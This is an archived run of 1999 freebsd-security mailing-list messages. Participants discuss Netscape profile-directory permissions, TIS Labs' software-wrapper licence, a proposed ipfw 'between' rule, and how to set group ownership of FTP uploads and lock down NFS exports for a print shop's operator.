PGP key fingerprint: 03 01 DD 8E 15 67 48 73  25 6D 10 FC EC 68 C1 1C
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
Safeport Network Services             http://www.safeport.com/

From owner-freebsd-security Fri Apr 9 6:52:55 1999
From: Robert Watson
To: Lauro Barbosa
Cc: freebsd-security@freebsd.org
Subject: Re: FreeBSD 2.2.8 and DES
Date: Fri, 9 Apr 1999 09:50:38 -0400 (EDT)
In-Reply-To: <370AB13A.3F2A2042@pro.via-rs.com.br>

On Tue, 6 Apr 1999, Lauro Barbosa wrote:

> Hello!
> Please, i need help.
> I have a server with FreeBSD 2.2.8 and DES installed.
> In this server the users can to login using login_name or
> login_name.
> (with dot at end). for example: john or john.
> Anybody know this problem ?
> How can to correct this ?
> Sorry my poor english.
> Please send me a answer in private to lauro@pro.via-rs.com.br,
> thanks,

Lauro,

Sorry -- I'm not sure if you mean that you would like them to be able to log in as either `user' or `user.', or that they can and that is a problem.
If you would like to change it so they can, my suspicion is that changes in PAM and getpwnam are the best place to do that, but it will probably require rebuilding a lot of stuff from source.  I don't believe there is a way to create such a mapping without software modification.

It is possible that adding two password entries for each uid, with and without a . in the username, would work, but password changing would probably be flaky, as possibly with other things.

Using a third party authentication mechanism like Kerberos might work, especially since in traditional kerberos `user.' is already equivalent to `user', as `user.' and `user' both indicate a null instance.  This would minimize required changes to the code base, perhaps.  Making sure, though, to have the `user' entry appear first, and that the users aren't going to need to change their user information.

It might be nice to have an /etc/useraliases that allows you to map names to other names, but I'm not sure it's generally desirable, and would introduce interoperability problems with other platforms.

Does anyone else know of a way to do this?

Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: 03 01 DD 8E 15 67 48 73  25 6D 10 FC EC 68 C1 1C
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.
http://www.tis.com/
Safeport Network Services             http://www.safeport.com/

From owner-freebsd-security Fri Apr 9 7:45:45 1999
From: Wes Peters
Organization: Softweyr LLC
To: Daniel Hagan
Cc: Robert Watson, Matthew Dillon, Foxfair Hu, freebsd-security@FreeBSD.ORG
Subject: Re: Fw: Netscape 4.5 vulnerability
Date: Fri, 09 Apr 1999 07:40:06 -0600
Message-ID: <370E0336.83577BA7@softweyr.com>

Daniel Hagan wrote:
>
> On Thu, 8 Apr 1999, Robert Watson wrote:
>
> > > The 'security hole' is that netscape doesn't make the .netscape
> > > directory 700.  I'd report it to netscape.  I dunno whether they
> > > will do anything about it, though.
> >
> > Huh.  Didn't do that for me; mine is safely readable and writable only for
> > my uid.
>
> What's your umask?  If you use umask 077, then this is what I would
> expect, but "typical" users who don't change it from 022 would probably
> end up with a 755 .netscape directory.  Netscape should be smart enough to
> at least set the profile file to 600, if not the entire directory to 700.

My umask is 022 and my .netscape directory is 700.  I didn't change it, so Netscape must have created it that way.
This is Communicator 4.5 (linux version; it's more reliable than the FreeBSD binary) on 3.1.

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                                  Softweyr LLC
http://www.softweyr.com/~softweyr                      wes@softweyr.com

From owner-freebsd-security Fri Apr 9 7:53:10 1999
From: Mark S Feldman
To: ark@eltex.ru
Cc: feldman@tislabs.com, freebsd-security@freebsd.org
Subject: Re: Generic Software Wrappers
Date: Fri, 09 Apr 1999 10:49:54 -0400
Message-Id: <199904091449.KAA21446@clipper.gw.tislabs.com>
In-reply-to: Your message of "Fri, 09 Apr 1999 12:47:57 +0400." <199904090847.MAA24024@paranoid.eltex.spb.ru>

> Is there a commercial/less restrictive license available?
> (if yes) how much does it cost?

There's no other license.  At least, not yet.  Since the current release is a research prototype (limited OS versions, expert-friendly, unoptimized, with more than a slight chance of bugs that could cause a kernel panic), the idea of paying for it may be a bit premature.  The current license looks to be perfectly adequate for downloading and experimenting with the code.
We're still working on our NT port and, as we write new wrappers and use the system on FreeBSD and Solaris, we will be fixing bugs and adding functionality.  We'll probably be putting out another release in the next month or two.  Our goals for distributing the code are to facilitate research and to see if there's interest in the technology.

Mark

From owner-freebsd-security Fri Apr 9 14:32:32 1999
From: Robert Watson
To: Wes Peters
Cc: The Tech-Admin Dude, Daniel Hagan, Matthew Dillon, Foxfair Hu, freebsd-security@freebsd.org
Subject: Re: Fw: Netscape 4.5 vulnerability
Date: Fri, 9 Apr 1999 12:37:42 -0400 (EDT)
In-Reply-To: <370E0826.FB33CE2@softweyr.com>

On Fri, 9 Apr 1999, Wes Peters wrote:

> The Tech-Admin Dude wrote:
> >
> > On Fri, 9 Apr 1999, Wes Peters wrote:
> >
> > > My umask is 022 and my .netscape directory is 700.  I didn't change it,
> > > so Netscape must have created it that way.  This is Communicator 4.5
> > > (linux version; it's more reliable than the FreeBSD binary) on 3.1.
> >
> > I'm using the FreeBSD binary and it is only readable to my UID also, and I
> > have not changed a thing..  One is not more reliable than the other, it's
> > the same code folks..
>
> On 3.1, I cannot keep the FreeBSD binary running for more than a few seconds.
> That's a notable difference to me, at least.

It looks like Netscape does create the directory correctly, so as surmised, it looks like this is "yet another person complaining about encrypted passwords that need to be decryptable for the program to function"; unless of course there is a version of Netscape that doesn't do it right; evidence suggests otherwise.

This conversation is rapidly leaving the realm of security; any followups on stability to -hackers please :-).  Netscape 4.5 communicator seems fairly stable on my 4.0-CURRENT machine as of just pre-egcs; when I go heavily java, occasionally windows get stuck wherein I can't follow links; opening a new window and closing the old usually fixes that.

Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: 03 01 DD 8E 15 67 48 73  25 6D 10 FC EC 68 C1 1C
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.
http://www.tis.com/
Safeport Network Services             http://www.safeport.com/

From owner-freebsd-security Fri Apr 9 14:33:36 1999
From: Robert Watson
To: Mark S Feldman
Cc: ark@eltex.ru, freebsd-security@freebsd.org
Subject: Re: Generic Software Wrappers
Date: Fri, 9 Apr 1999 12:44:14 -0400 (EDT)
In-Reply-To: <199904091449.KAA21446@clipper.gw.tislabs.com>

On Fri, 9 Apr 1999, Mark S Feldman wrote:

> > Is there a commercial/less restrictive license available?
> > (if yes) how much does it cost?
>
> There's no other license.  At least, not yet.  Since the current
> release is a research prototype (limited OS versions, expert-friendly,
> unoptimized, with more than a slight chance of bugs that could cause a
> kernel panic), the idea of paying for it may be a bit premature.  The
> current license looks to be perfectly adequate for downloading and
> experimenting with the code.
>
> We're still working on our NT port and, as we write new wrappers and
> use the system on FreeBSD and Solaris, we will be fixing bugs and
> adding functionality.  We'll probably be putting out another release
> in the next month or two.
> Our goals for distributing the code are to
> facilitate research and to see if there's interest in the technology.

As I mentioned in a private mail to Mark and that I'll now mention in a public forum: in a few weeks after I've turned in my thesis and finished up a plethora of other projects, I'll look at porting the TISLabs code forward to 3.x/4.x.  The work is of interest to me research-wise, at least, because it is a more general form of my freebsd tokens behavior which attempts to impose alternative security semantics on a traditional operating system; the PAG support in Arla is presumably similar in concept.

Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: 03 01 DD 8E 15 67 48 73  25 6D 10 FC EC 68 C1 1C
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
Safeport Network Services             http://www.safeport.com/

From owner-freebsd-security Fri Apr 9 14:35:47 1999
From: ark@eltex.ru
Date: Fri, 9 Apr 1999 20:47:17 +0400
Message-Id: <199904091647.UAA25769@paranoid.eltex.spb.ru>
Organization:
"Klingon Imperial Intelligence Service"
Subject: Re: Generic Software Wrappers
To: robert+freebsd@cyrus.watson.org
Cc: feldman@tislabs.com, ark@eltex.ru, freebsd-security@freebsd.org

nuqneH,

Sounds extremely interesting, but the license is definitely too restrictive to make the tool really useful in general :( hope this will change..

CU in Hell  /Arkan#iD
Do i believe in Bible? Hell,man,i've seen one!

From owner-freebsd-security Fri Apr 9 15:11:30 1999
From: The Tech-Admin Dude
To: Wes Peters
Cc: Daniel Hagan, Robert Watson, Matthew Dillon, Foxfair Hu, freebsd-security@FreeBSD.ORG
Subject: Re: Fw: Netscape 4.5 vulnerability
Date: Fri, 9 Apr 1999 10:57:37 -0400 (EDT)
In-Reply-To: <370E0336.83577BA7@softweyr.com>

On Fri, 9 Apr 1999, Wes Peters wrote:

>
> Daniel Hagan wrote:
> >
> > On Thu, 8 Apr 1999, Robert Watson wrote:
> >
> > > > The 'security hole' is that netscape doesn't make the .netscape
> > > > directory 700.  I'd report it to netscape.  I dunno whether they
> > > > will do anything about it, though.
> > >
> > > Huh.  Didn't do that for me; mine is safely readable and writable only for
> > > my uid.
> >
> > What's your umask?  If you use umask 077, then this is what I would
> > expect, but "typical" users who don't change it from 022 would probably
> > end up with a 755 .netscape directory.  Netscape should be smart enough to
> > at least set the profile file to 600, if not the entire directory to 700.
>
> My umask is 022 and my .netscape directory is 700.  I didn't change it,
> so Netscape must have created it that way.  This is Communicator 4.5
> (linux version; it's more reliable than the FreeBSD binary) on 3.1.
>
> --
> "Where am I, and what am I doing in this handbasket?"
>
> Wes Peters                                                  Softweyr LLC
> http://www.softweyr.com/~softweyr                      wes@softweyr.com
>

I'm using the FreeBSD binary and it is only readable to my UID also, and I have not changed a thing..  One is not more reliable than the other, it's the same code folks..

From owner-freebsd-security Fri Apr 9 16:28:31 1999
From: Luigi Rizzo
Message-Id: <199904091303.PAA00939@labinfo.iet.unipi.it>
Subject: Re: Ipfw related.
To: ru@ucb.crimea.ua (Ruslan Ermilov)
Date: Fri, 9 Apr 1999 15:03:12 +0200 (MET DST)
Cc: smelekov@vniigazmain.gazprom.ru, freebsd-security@freebsd.org, luigi@freebsd.org
In-Reply-To: <19990409141345.A31742@relay.ucb.crimea.ua> from "Ruslan Ermilov" at Apr 9, 99 02:13:26 pm

> > Is there any other ways to deny packets in both sides (in and out)
> > by writing only one ipfw rule?
> >
>
> No, not yet.
>
> Luigi had some plans (???) to implement ``between'' predicate,
> so you'd be able to write:
>
> ipfw add xxxx deny ip between my.host.com and evil.host.com

unfortunately, just plans (or even precise ideas on how to implement something, as in this case) without a strong need for a feature mean it will be severely delayed by other things...

cheers
luigi

From owner-freebsd-security Fri Apr 9 18:11:45 1999
From: Brett Glass
To: security@freebsd.org
Subject: Interesting problem: chowning files sent via FTP
Date: Fri, 09 Apr 1999 19:09:23 -0600
Message-Id: <4.2.0.32.19990409184654.045424d0@localhost>

Here's an interesting security problem that
perhaps folks on this list can help with.  I'm working with a client who does printing and computer graphics.  He wants his customers to be able to upload graphics files via FTP and then allow an on-site operator to retrieve them.

The customers should be able to FTP only into their own home directories (easy to implement via the built-in chrooting features of ftpd).  The operator should be able to read and delete the files the users upload, preferably via NFS.  But he shouldn't have full root privileges -- rather, he should have just enough privilege to work with those files.

It seems to me that a good way to implement this would be to have the customers make their uploaded files group read/writable by a group of which the operator is the sole member.  The operator would then mount /home via NFS, and would be granted only the privileges associated with his user ID and group.  This would allow him to read and delete the files that the users had uploaded for him, but would not let him mess with the directory structure or with any files that hadn't been uploaded with the right modes or ownership.

There are two problems, though.  First of all, it appears that FTP doesn't have a built-in way of setting group ownership of an uploaded file.  (It does let you set the UMASK, but there's no obvious way to say which group "owns" the file.)  How could this be done by the FTP client?  Can the customer give group ownership of the file to a group of which the user is not himself a member?

Second, I need to set up NFS so that only the operator can mount /home from his one machine, and only with the privileges that would be accorded to him if he logged onto the machine himself.  We want to make this as secure as possible, since the customers' data may be proprietary.  So, we'll want to restrict NFS mounts to a specific IP address and authenticate as best we can.
(If it's REALLY necessary, we may be able to have the operator use FTP, but this is less desirable than letting him mount the directory.)

Ideas on how to solve these two problems?  Any other considerations I should be thinking of?

--Brett Glass

From owner-freebsd-security Fri Apr 9 19:47:40 1999
From: Kenneth Ingham
To: Brett Glass, security@FreeBSD.ORG
Subject: Re: Interesting problem: chowning files sent via FTP
Date: Fri, 9 Apr 1999 19:44:02 -0600
Message-ID: <19990409194402.A731@socrates.i-pi.com>
In-Reply-To: <4.2.0.32.19990409184654.045424d0@localhost>; from Brett Glass on Fri, Apr 09, 1999 at 07:09:23PM -0600

As I remember (and I just checked this on a 2.2.8 system and it appears to be correct), the default group owner of a file is the group owner of the directory containing the file.

I've seen other systems which set the setgid bit on the dir to get this behavior.
Kenneth

From owner-freebsd-security Fri Apr 9 21:30:51 1999
From: Wes Peters
Organization: Softweyr LLC
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: Interesting problem: chowning files sent via FTP
Date: Fri, 09 Apr 1999 21:25:19 -0600
Message-ID: <370EC49F.1A020B9D@softweyr.com>
References: <4.2.0.32.19990409184654.045424d0@localhost>

Brett Glass wrote:
>
> Here's an interesting security problem that perhaps folks on this list can
> help with.  I'm working with a client who does printing and computer
> graphics.  He wants his customers to be able to upload graphics files via
> FTP and then allow an on-site operator to retrieve them.
>
> The customers should be able to FTP only into their own home directories
> (easy to implement via the built-in chrooting features of ftpd).  The
> operator should be able to read and delete the files the users upload,
> preferably via NFS.  But he shouldn't have full root privileges -- rather,
> he should have just enough privilege to work with those files.
>
> It seems to me that a good way to implement this would be to have the
> customers make their uploaded files group read/writable by a group of which
> the operator is the sole member.
> The operator would then mount /home via
> NFS, and would be granted only the privileges associated with his user ID
> and group.  This would allow him to read and delete the files that the users
> had uploaded for him, but would not let him mess with the directory
> structure or with any files that hadn't been uploaded with the right modes
> or ownership.
>
> There are two problems, though.  First of all, it appears that FTP doesn't
> have a built-in way of setting group ownership of an uploaded file.  (It
> does let you set the UMASK, but there's no obvious way to say which group
> "owns" the file.)  How could this be done by the FTP client?  Can the
> customer give group ownership of the file to a group of which the user is
> not himself a member?

An interesting problem you have there, Brett.  I can think of one quick solution: if the ftp server is dedicated to this task, you could make ftpd sgid to the "printer" group.

It's too bad that the exports file does not support "mapgroup" commands orthogonal to the "maproot" command.  Arbitrary user mappings might be of value too, but I can see how they could quickly grow completely out of reason.

> Second, I need to set up NFS so that only the operator can mount /home from
> his one machine, and only with the privileges that would be accorded to him
> if he logged onto the machine himself.  We want to make this as secure as
> possible, since the customers' data may be proprietary.  So, we'll want to
> restrict NFS mounts to a specific IP address and authenticate as best we
> can.  (If it's REALLY necessary, we may be able have the operator use FTP,
> but this is less desirable than letting him mount the directory.)
>
> Ideas on how to solve these two problems?  Any other considerations I should
> be thinking of?

I'm thinking you can probably do this by exporting the filesystem from the ftp server ONLY to the printer's workstation, and exporting with -mapall=printeruid:printergid.
Run the ftpd as sgid printergid, so the files end up being group owned by printergid.  I'm not sure how this will interact with being able to delete the files, but if you think along these lines I think you can solve it without hacking {much|anything}.

Best of luck, and write back if you have specific questions.  I'm a little intrigued by this.  I know several print shops around here that try, and often fail, to have clients email them large postscript or pre-ripped print files, and they may be able to benefit from your experience also.  ;^)

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                                  Softweyr LLC
http://www.softweyr.com/~softweyr                      wes@softweyr.com

From owner-freebsd-security Fri Apr 9 21:35:58 1999
From: Brett Glass
To: Kenneth Ingham, security@FreeBSD.ORG
Subject: Re: Interesting problem: chowning files sent via FTP
Date: Fri, 09 Apr 1999 22:33:33 -0600
Message-Id: <4.2.0.32.19990409223014.0451c930@localhost>
In-Reply-To: <19990409194402.A731@socrates.i-pi.com>
References: <4.2.0.32.19990409184654.045424d0@localhost>

Is this so?
I was under the impression that the default group of a new file was the login group of the creator, as specified in /etc/passwd.

As for the setgid-on-execution bit: there's no documentation on what it does when set on a directory.  The chmod(1) man page doesn't say anything.  Does it change the group ownership of newly created files?

--Brett

At 07:44 PM 4/9/99 -0600, Kenneth Ingham wrote:

>As I remember (and I just checked this on a 2.2.8 system and it appears
>to be correct), the default group owner of a file is the group owner of the
>directory containing the file.
>
>I've seen other systems which set the setgid bit on the dir to get this
>behavior.
>
>Kenneth

From owner-freebsd-security Fri Apr 9 22: 0:13 1999
From: Brett Glass
To: Wes Peters
Cc: security@FreeBSD.ORG
Subject: Re: Interesting problem: chowning files sent via FTP
Date: Fri, 09 Apr 1999 22:56:52 -0600
Message-Id: <4.2.0.32.19990409223443.0451c100@localhost>
In-Reply-To: <370EC49F.1A020B9D@softweyr.com>
References: <4.2.0.32.19990409184654.045424d0@localhost>

At 09:25 PM 4/9/99 -0600, Wes Peters wrote:

>An interesting problem you have there, Brett.
>I can think of one quick
>solution: if the ftp server is dedicated to this task, you could make
>ftpd sgid to the "printer" group.

An interesting idea.  However, other users who used FTP (including administrators!) would wind up creating files that were owned by the "printer" group instead of their own group.  We wouldn't want that as the default behavior.  The responses about the "setgid" bit on directories suggest a possible way to make this work, but I'll have to test the behavior to see if it really happens.  It's not documented, but who knows?  It just might work.  Do you have experience with this?

>It's too bad that the exports file does not support "mapgroup" commands
>orthogonal to the "maproot" command.  Arbitrary user mappings might be
>of value too, but I can see how they could quickly grow completely out
>of reason.

Well, any sort of access control to a UNIX server really ought to include both user and group permissions.  Otherwise, you've lost the control that UNIX affords over file access.

Groups in UNIX are far from ideal, though, because a file can have only one owning group.  And the number of groups of which a user can be a member is limited and implementation-dependent.  (FreeBSD squawks when a user is a member of more than 16 groups.)  The number of members of a group is likewise limited.  (I believe that in FreeBSD the limit's 200.)  All of these constraints make implementing any security scheme a bit awkward.

>I'm thinking you can probably do this by exporting the filesystem from
>the ftp server ONLY to the printer's workstation, and exporting with
>-mapall=printeruid:printergid.

I'm looking at something like this.  If we use a dedicated Ethernet interface for the link to the printer's workstation and only allow Subnet 10 IP addresses on that link, we'll be able to restrict mounts to the one Subnet 10 address.  It'd be tough to penetrate this, especially with ipfw configured properly and a firewall router on the other interface.
Y'know, it'd be really nice if NFS had "accounts" and "passwords" per se, but as far as I know the only version that had anything like this was a proposed "standard" for file transfers that went nowhere. (What was the name again? I forget.)

>Best of luck, and write back if you have specific questions. I'm a little
>intrigued by this. I know several print shops around here that try, and
>often fail, to have clients email them large postscript or pre-ripped print
>files, and they may be able to benefit from your experience also. ;^)

Well, FTP isn't an ideal solution, because it sends passwords in the clear. But if you place disk space quotas on the users and chroot them, the damage that can be done with a sniffed password is at least limited. A VPN protocol or secure sockets would be preferable, and I'm moving them to such things as fast as I can.

--Brett

From owner-freebsd-security Fri Apr 9 22:25:20 1999
Delivered-To: freebsd-security@freebsd.org
Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id D422114D51 for ; Fri, 9 Apr 1999 22:25:08 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from softweyr.com ([204.68.178.225]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id XAA29244; Fri, 9 Apr 1999 23:22:43 -0600 (MDT) (envelope-from wes@softweyr.com)
Message-ID: <370ED16D.582E4F19@softweyr.com>
Date: Fri, 09 Apr 1999 22:19:57 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: Interesting problem: chowning files sent via FTP
References: <4.2.0.32.19990409184654.045424d0@localhost> <4.2.0.32.19990409223443.0451c100@localhost>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Brett Glass wrote:
> 
> At 09:25 PM 4/9/99 -0600, Wes Peters wrote:
> 
> >An interesting problem you have there, Brett. I can think of one quick
> >solution: if the ftp server is dedicated to this task, you could make
> >ftpd sgid to the "printer" group.
> 
> An interesting idea. However, other users who used FTP (including
> administrators!) would wind up creating files that were owned
> by the "printer" group instead of their own group. We wouldn't
> want that as the default behavior. The responses about the "setgid"
> bit on directories suggest a possible way to make this work, but
> I'll have to test the behavior to see if it really happens. It's
> not documented, but who knows? It just might work. Do you have
> experience with this?

I just gave it a try here, by adding myself to the "xten" group and logging in freshly. I changed a directory under my home to group xten, cd'd into it, and touched a file. Sure enough, it was owned by group xten. I ftp'd to localhost, cd'd to that directory, and put a file, which ended up owned by xten as well. It looks like this will work for you.

> >It's too bad that the exports file does not support "mapgroup" commands
> >orthogonal to the "maproot" command. Arbitrary user mappings might be
> >of value too, but I can see how they could quickly grow completely out
> >of reason.
> 
> Well, any sort of access control to a UNIX server really ought to include
> both user and group permissions. Otherwise, you've lost the control that
> UNIX affords over file access.
> 
> Groups in UNIX are far from ideal, though, because a file can have only one
> owning group. And the number of groups of which a user can be a member
> is limited and implementation-dependent. (FreeBSD squawks when a user
> is a member of more than 16 groups.) The number of members of a group
> is likewise limited. (I believe that in FreeBSD the limit's 200.)
> All of
> these constraints make implementing any security scheme a bit awkward.

Yet another design for an ACL filesystem was bandied about a month ago, but as usual everyone went hog-wild with unlimited lists of ACLs, and disk blocks scattered all over hell and back, and then went nowhere with it. And they wonder why I get pissed and tell them "do the simple one first, then expand it if it needs expanding." Five or eight ACLs is better than none, and is probably better than thousands of ACLs that never get implemented, too.

> >I'm thinking you can probably do this by exporting the filesystem from
> >the ftp server ONLY to the printer's workstation, and exporting with
> >-mapall=printeruid:printergid.
> 
> I'm looking at something like this. If we use a dedicated Ethernet
> interface for the link to the printer's workstation and only allow
> Subnet 10 IP addresses on that link, we'll be able to restrict mounts
> to the one Subnet 10 address. It'd be tough to penetrate this,
> especially with ipfw configured properly and a firewall router on
> the other interface.

I'd suggest using a dedicated NIC on both the ftp server and the printer's workstation, if at all possible. A single crossover wire would make it VERY difficult to abuse that interface for hacking purposes, at least without being noticed. You could script a simple monitor that would warn of any disruptions in service if you're really concerned about the link.

> Y'know, it'd be really nice if NFS had "accounts" and "passwords" per se,
> but as far as I know the only version that had anything like this was a
> proposed "standard" for file transfers that went nowhere. (What was
> the name again? I forget.)

FSP? I never really looked into it that much, it seemed like it was doomed before it got out of the chute. Seems a shame, too, given that it was supposedly more reliable than NFS and easier to control than either NFS or FTP.

> >Best of luck, and write back if you have specific questions.
> >I'm a little
> >intrigued by this. I know several print shops around here that try, and
> >often fail, to have clients email them large postscript or pre-ripped print
> >files, and they may be able to benefit from your experience also. ;^)
> 
> Well, FTP isn't an ideal solution, because it sends passwords in the clear.
> But if you place disk space quotas on the users and chroot them, the damage
> that can be done with a sniffed password is at least limited. A VPN protocol
> or secure sockets would be preferable, and I'm moving them to such things as
> fast as I can.

One of these days somebody needs to actually implement a mailer that supports the "external reference" capability of MIME. You know, you attach a huge file to a mail message, and rather than sending the file base64 encoded through the email system it sticks it on a secure public server along with a list of who you've sent it to and an expiration date. The public server will allow only those who were sent the file to retrieve it. Once everyone has accessed the file OR the expiration date has been reached, the file is quietly deleted from the public server.

-- 
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                     Softweyr LLC
http://www.softweyr.com/~softweyr                           wes@softweyr.com

From owner-freebsd-security Fri Apr 9 22:50:54 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 0955714EEE for ; Fri, 9 Apr 1999 22:50:52 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id XAA03612; Fri, 9 Apr 1999 23:48:27 -0600 (MDT)
Message-Id: <4.2.0.32.19990409234113.04621730@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta)
Date: Fri, 09 Apr 1999 23:48:23 -0600
To: Wes Peters
From: Brett Glass
Subject: Re: Interesting problem: chowning files sent via FTP
Cc: security@FreeBSD.ORG
In-Reply-To: <370ED16D.582E4F19@softweyr.com>
References: <4.2.0.32.19990409184654.045424d0@localhost> <4.2.0.32.19990409223443.0451c100@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 10:19 PM 4/9/99 -0600, Wes Peters wrote:
>I'd suggest using a dedicated NIC on both the ftp server and the
>printer's workstation, if at all possible.

Well, actually, the printer will mount the NFS volume through his Netware server. (I only learned recently that this was possible.) So, the link would go to his server. It'd be quite secure still, though, as Netware has good security.

> FSP? I never really looked into it that much, it seemed like it was
>doomed before it got out of the chute. Seems a shame, too, given that
>it was supposedly more reliable than NFS and easier to control than
>either NFS or FTP.

It was done to counter a Microsoft proposal which likewise went nowhere. Both died due to lack of interest.
>One of these days somebody needs to actually implement a mailer that
>supports the "external reference" capability of MIME. You know, you
>attach a huge file to a mail message, and rather than sending the
>file base64 encoded through the email system it sticks it on a secure
>public server along with a list of who you've sent it to and an expiration
>date. The public server will allow only those who were sent the file to
>retrieve it. Once everyone has accessed the file OR the expiration date
>has been reached, the file is quietly deleted from the public server.

I like that idea. The only trick would be authenticating the users who went to the public drop to pick up the file. You'd need to give them unique keys which they'd have to decode with some secret they had.... Perhaps their RSA private keys. And then re-encrypt with the repository's public key. Hmmm. This gets complicated.

--Brett

From owner-freebsd-security Fri Apr 9 23:40:30 1999
Delivered-To: freebsd-security@freebsd.org
Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 3AFBF14ED6 for ; Fri, 9 Apr 1999 23:40:27 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from softweyr.com ([204.68.178.225]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id AAA29375; Sat, 10 Apr 1999 00:38:09 -0600 (MDT) (envelope-from wes@softweyr.com)
Message-ID: <370EE31D.E6A8B0EC@softweyr.com>
Date: Fri, 09 Apr 1999 23:35:25 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: Interesting problem: chowning files sent via FTP
References: <4.2.0.32.19990409184654.045424d0@localhost> <4.2.0.32.19990409223443.0451c100@localhost> <4.2.0.32.19990409234113.04621730@localhost>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Brett Glass wrote:
> 
> At 10:19 PM 4/9/99 -0600, Wes Peters wrote:
> 
> >One of these days somebody needs to actually implement a mailer that
> >supports the "external reference" capability of MIME. You know, you
> >attach a huge file to a mail message, and rather than sending the
> >file base64 encoded through the email system it sticks it on a secure
> >public server along with a list of who you've sent it to and an expiration
> >date. The public server will allow only those who were sent the file to
> >retrieve it. Once everyone has accessed the file OR the expiration date
> >has been reached, the file is quietly deleted from the public server.
> 
> I like that idea. The only trick would be authenticating the users who
> went to the public drop to pick up the file. You'd need to give them unique
> keys which they'd have to decode with some secret they had.... Perhaps
> their RSA private keys. And then re-encrypt with the repository's public
> key. Hmmm. This gets complicated.

I think the idea was to generate a one-time key that was transported in the MIME header, with the idea that the document itself would be encrypted if it contained sensitive information. The combination of the key and your RSA encryption suffices for authentication, and using the sender's public key authenticates the sender to the recipient. It's basically the PGP scheme all over again, where the doubly encrypted data this time is an access key rather than an encryption secret. You could, of course, use the access key as an encryption secret as well.

-- 
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                     Softweyr LLC
http://www.softweyr.com/~softweyr                           wes@softweyr.com

From owner-freebsd-security Sat Apr 10 00:19:26 1999
Delivered-To: freebsd-security@freebsd.org
Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id AFC56150BE for ; Sat, 10 Apr 1999 00:19:22 -0700 (PDT) (envelope-from sthaug@nethelp.no)
Received: (qmail 31186 invoked by uid 1001); 10 Apr 1999 07:17:08 +0000 (GMT)
To: brett@lariat.org
Cc: ingham@i-pi.com, security@FreeBSD.ORG
Subject: Re: Interesting problem: chowning files sent via FTP
From: sthaug@nethelp.no
In-Reply-To: Your message of "Fri, 09 Apr 1999 22:33:33 -0600"
References: <4.2.0.32.19990409223014.0451c930@localhost>
X-Mailer: Mew version 1.05+ on Emacs 19.34.2
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Date: Sat, 10 Apr 1999 09:17:08 +0200
Message-ID: <31184.923728628@verdi.nethelp.no>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Is this so? I was under the impression that the default group of a
> new file was the login group of the creator, as specified in /etc/passwd.

AFAIK, in all BSD versions the default group of a new file is the group of the directory it is created in.

> As for the setgid-on-execution bit: there's no documentation on what it
> does when set on a directory. The chmod(1) man page doesn't say anything.
> Does it change the group ownership of newly created files?

setgid on a directory is a SYSV-ism (or rather, close to a SVR4-ism). It means that the SYSV system in question should follow the BSD semantics for files created in this directory, instead of the default SYSV semantics (set the group of the file to the effective gid of the creating process).

setgid on a directory works this way at least in Solaris 2 and HP-UX 10.x/11.x.
Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Sat Apr 10 00:55:11 1999
Delivered-To: freebsd-security@freebsd.org
Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [130.126.8.20]) by hub.freebsd.org (Postfix) with ESMTP id 3F1B214C26 for ; Sat, 10 Apr 1999 00:55:08 -0700 (PDT) (envelope-from igor@alecto.physics.uiuc.edu)
Received: (from igor@localhost) by alecto.physics.uiuc.edu (8.9.0/8.9.0) id CAA21374; Sat, 10 Apr 1999 02:52:54 -0500 (CDT)
From: Igor Roshchin
Message-Id: <199904100752.CAA21374@alecto.physics.uiuc.edu>
Subject: Re: Interesting problem: chowning files sent via FTP
